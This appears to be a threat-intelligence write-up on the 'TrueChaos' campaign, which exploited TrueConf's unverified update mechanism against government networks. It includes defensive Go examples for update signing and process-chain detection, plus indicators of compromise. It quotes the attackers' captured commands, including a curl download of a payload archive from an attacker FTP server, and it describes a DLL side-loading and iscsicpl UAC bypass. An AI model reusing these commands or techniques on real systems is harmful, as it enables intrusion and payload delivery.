At the start of 2026, cybersecurity researchers uncovered a concerning campaign targeting government organizations across Southeast Asia. What made this case unusual wasn’t just the sophistication of the attackers—it was the method they used. Instead of exploiting an obvious vulnerability, they abused a trusted enterprise tool already installed in the victims’ environments: TrueConf.
This investigation led to the discovery of a previously unknown vulnerability, now tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw lies in how the TrueConf client handles software updates, allowing attackers to distribute malicious files through a system that users typically trust without question.
TrueConf itself is widely used across the globe. It provides secure video conferencing solutions for enterprises, governments, and critical infrastructure sectors. One of its biggest advantages is its ability to run entirely on-premises, meaning organizations can host everything within their own private networks. This setup is particularly valuable in sensitive environments like military systems, government agencies, and locations where internet access is unreliable or restricted.
Because of this architecture, there is an inherent trust between the central server and all connected clients. That trust, unfortunately, became the main weakness in this case.

How the Vulnerability Works
When a TrueConf client starts, it checks with the internal server to see if a newer version is available. If an update exists, users are prompted to download it from the server. This process appears routine and safe.
However, the problem is that the update mechanism does not properly verify whether the update file is legitimate. There are no strong integrity or authenticity checks in place. This means that if an attacker gains control over the on-premises server, they can replace the update file with a malicious executable.
Once this happens, every connected client becomes a potential target. The system essentially turns into a distribution channel for malware.
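The check that this update path lacks, shown as an added example in Go (not TrueConf code and not from the report): the client verifies a signed manifest under a key pinned in the client before trusting the package hash, so a server-side attacker who swaps the file and rewrites the hash still fails. The manifest layout and the Ed25519 scheme are assumptions for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
)

// Manifest is served next to the package; its field names are assumptions for this example.
type Manifest struct {
	Version string `json:"version"`
	SHA256  string `json:"sha256"`
}
// VerifyUpdate accepts a package only if the manifest verifies under the key pinned in the
// client AND the package hash matches that signed manifest. A compromised server can rewrite
// both files, but it cannot forge the vendor's signature.
func VerifyUpdate(pinned ed25519.PublicKey, manifest, sig, pkg []byte) error {
	if !ed25519.Verify(pinned, manifest, sig) {
		return errors.New("manifest not signed by pinned vendor key")
	}
	var m Manifest
	if err := json.Unmarshal(manifest, &m); err != nil {
		return err
	}
	if sum := sha256.Sum256(pkg); hex.EncodeToString(sum[:]) != m.SHA256 {
		return errors.New("package hash does not match signed manifest")
	}
	return nil
}
// manifestFor builds the manifest the vendor signs at build time (never on the update server).
func manifestFor(version string, pkg []byte) []byte {
	sum := sha256.Sum256(pkg)
	b, _ := json.Marshal(Manifest{Version: version, SHA256: hex.EncodeToString(sum[:])})
	return b
}
// Demo returns (genuineAccepted, tamperedRejected) using constructed sample bytes.
func Demo() (bool, bool) {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader) // vendor key pair; pub ships pinned in the client
	genuine := []byte("constructed sample: genuine 8.5.2 installer")
	manifest := manifestFor("8.5.2", genuine)
	sig := ed25519.Sign(priv, manifest)
	accepted := VerifyUpdate(pub, manifest, sig, genuine) == nil
	// Server-side attacker swaps the package and rewrites the manifest hash to match, but
	// can only replay the old signature, which does not cover the rewritten manifest.
	evil := []byte("constructed sample: trojanized installer")
	rejected := VerifyUpdate(pub, manifestFor("8.5.2", evil), sig, evil) != nil
	return accepted, rejected
}
```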
Operation “TrueChaos” in the Wild
In the observed attack campaign—dubbed “TrueChaos”—the attackers exploited this exact weakness. They compromised a central TrueConf server operated by a government IT department. This server was responsible for serving multiple agencies across the country.
Instead of targeting each organization individually, the attackers simply replaced the legitimate update package on the server. When users launched their TrueConf clients, they were prompted to install what appeared to be a routine update. In reality, they were installing malware.
The malicious package was cleverly built. It used Inno Setup and successfully mimicked a normal upgrade from version 8.5.1 to 8.5.2. Alongside legitimate files, it dropped:
- poweriso.exe (benign executable)
- 7z-x64.dll (malicious DLL)
These were placed in:
C:\ProgramData\PowerISO\
The attackers then used DLL side-loading to execute their payload.
What the Attackers Did Next
Once inside the system, the attackers performed several hands-on activities. These included reconnaissance, persistence, and further payload delivery.
Some of the commands observed:
tasklist > cache
tracert 8.8.8.8 -h 5
They also downloaded additional components. The recorded command line below shows a curl FTP download and a WinRAR extraction run together, exactly as captured:
curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>
To escalate privileges, they abused a known Windows mechanism involving iscsicpl.exe. By manipulating the user’s PATH environment variable, they forced Windows to load a malicious DLL (iscsiexe.dll), effectively bypassing User Account Control (UAC) without triggering alerts.
The archive they downloaded contained:
- 7z.exe (legitimate)
- iscsiexe.dll (malicious loader)
- rom.dat (encrypted, purpose unclear)
The iscsiexe.dll component was not a full backdoor but acted as a persistence tool, ensuring continued execution of a renamed binary (winexec.exe).

Command-and-Control and Final Payload
Although the final payload was not directly recovered, researchers observed communication with:
- 47.237.15[.]197
- 43.134.90[.]60
- 43.134.52[.]221
These servers were linked to Havoc C2 infrastructure. Based on this evidence, it is highly likely that the attackers deployed a Havoc implant.
Havoc is an open-source post-exploitation framework. While it is designed for legitimate security testing, it is frequently misused in real-world attacks.
Attribution Insights
Researchers believe, with moderate confidence, that this operation is linked to a Chinese-nexus threat actor. This assessment is based on several indicators:
- Use of DLL sideloading techniques
- Infrastructure hosted on Alibaba Cloud and Tencent services
- Targeting aligned with geopolitical interests
Interestingly, the same victim was also targeted with ShadowPad malware around the same time, suggesting either shared access or multiple threat groups operating simultaneously.
Indicators of Compromise (IOCs)
Files (name – role – MD5):
- trueconf_windows_update.exe – Malicious update – 22e32bcf113326e366ac480b077067cf
- iscsiexe.dll – Loader – 9b435ad985b733b64a6d5f39080f4ae0
- 7z-x64.dll – Havoc implant – 248a4d7d4c48478dcbeade8f7dba80b3
C2 Infrastructure:
- 43.134.90[.]60
- 43.134.52[.]221
- 47.237.15[.]197
Suspicious Artifacts & Behavior:
- C:\ProgramData\PowerISO\poweriso.exe
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck
- %AppData%\Roaming\Adobe\update.7z
- 7za.exe, iscsiexe.dll, rom.dat
Process Chain to Monitor:
- trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp
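Hunting logic for the process chain and drop path listed above, as an added example in Go (not code from the report): it walks parent relationships in process-creation events, flags the trueconf.exe → trueconf_windows_update.exe → trueconf_windows_update.tmp chain, and rates any execution from C:\ProgramData\PowerISO\ higher when it descends from that chain. The event shape, PIDs and paths are constructed for the example.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)
// Event is a minimal process-creation record (Sysmon event 1 / Security 4688 style); constructed shape.
type Event struct {
	PID, PPID int
	Image     string // full image path as logged
}
func base(p string) string { return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/"))) }
// chain returns lowercase image basenames walking up from pid (pid itself first).
func chain(byPID map[int]Event, pid int) []string {
	var out []string
	for e, ok := byPID[pid]; ok && len(out) < 8; e, ok = byPID[e.PPID] { // depth cap guards PID-reuse loops
		out = append(out, base(e.Image))
	}
	return out
}
// Detect applies two rules from the IOC section: the documented update chain, and any execution
// from the PowerISO drop directory (rated high when it descends from that chain).
func Detect(events []Event) []string {
	byPID := make(map[int]Event, len(events))
	for _, e := range events { byPID[e.PID] = e }
	var findings []string
	for _, e := range events {
		parents := chain(byPID, e.PPID)
		if base(e.Image) == "trueconf_windows_update.tmp" && len(parents) >= 2 &&
			parents[0] == "trueconf_windows_update.exe" && parents[1] == "trueconf.exe" {
			findings = append(findings, fmt.Sprintf("pid %d: TrueConf update chain ran; confirm package hash against a known-good release", e.PID))
		}
		if strings.HasPrefix(strings.ToLower(e.Image), `c:\programdata\poweriso\`) {
			sev := "medium"
			if strings.Contains(strings.Join(parents, "/"), "trueconf_windows_update.tmp") { sev = "high" }
			findings = append(findings, fmt.Sprintf("pid %d: %s: execution from PowerISO drop path, parent chain %v", e.PID, sev, parents))
		}
	}
	return findings
}
// SampleEvents mirrors the reported chain; all PIDs and paths are constructed.
var SampleEvents = []Event{
	{PID: 100, PPID: 1, Image: `C:\Program Files\TrueConf\trueconf.exe`},
	{PID: 200, PPID: 100, Image: `C:\Users\u\AppData\Local\Temp\trueconf_windows_update.exe`},
	{PID: 300, PPID: 200, Image: `C:\Users\u\AppData\Local\Temp\is-ABCD.tmp\trueconf_windows_update.tmp`},
	{PID: 400, PPID: 300, Image: `C:\ProgramData\PowerISO\poweriso.exe`},
}
```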
Final Thoughts
This case is a strong reminder that even trusted internal systems can become attack vectors. The attackers didn’t need to breach every endpoint—they only needed to compromise a single trusted server.
It also highlights the importance of monitoring routine processes. What initially looked like normal software behavior turned out to be a large-scale compromise mechanism.
Our Opinion on This Incident
What stands out most in this case is how easily trust can be weaponized in enterprise environments. Organizations often assume that internal systems—especially those not exposed to the internet—are inherently safe. This mindset can lead to gaps in validation, monitoring, and verification processes.
The TrueConf vulnerability shows that internal infrastructure is just as critical to secure as external-facing systems. The lack of proper update validation is not just a technical oversight—it reflects a broader issue in how software trust models are designed. If a system blindly trusts its own update source without verification, it creates a single point of failure that attackers can exploit at scale.
Another important takeaway is the attackers’ efficiency. Instead of noisy, large-scale attacks, they chose a quiet and centralized approach. This allowed them to impact multiple agencies with minimal effort while staying under the radar.
In our view, organizations must rethink how they handle internal updates. Code signing, integrity checks, and behavioral monitoring should be mandatory, not optional. Additionally, security teams should treat internal servers with the same level of scrutiny as internet-facing assets.
Ultimately, this incident is not just about one vulnerability—it’s about a flawed trust assumption that exists in many enterprise systems today.
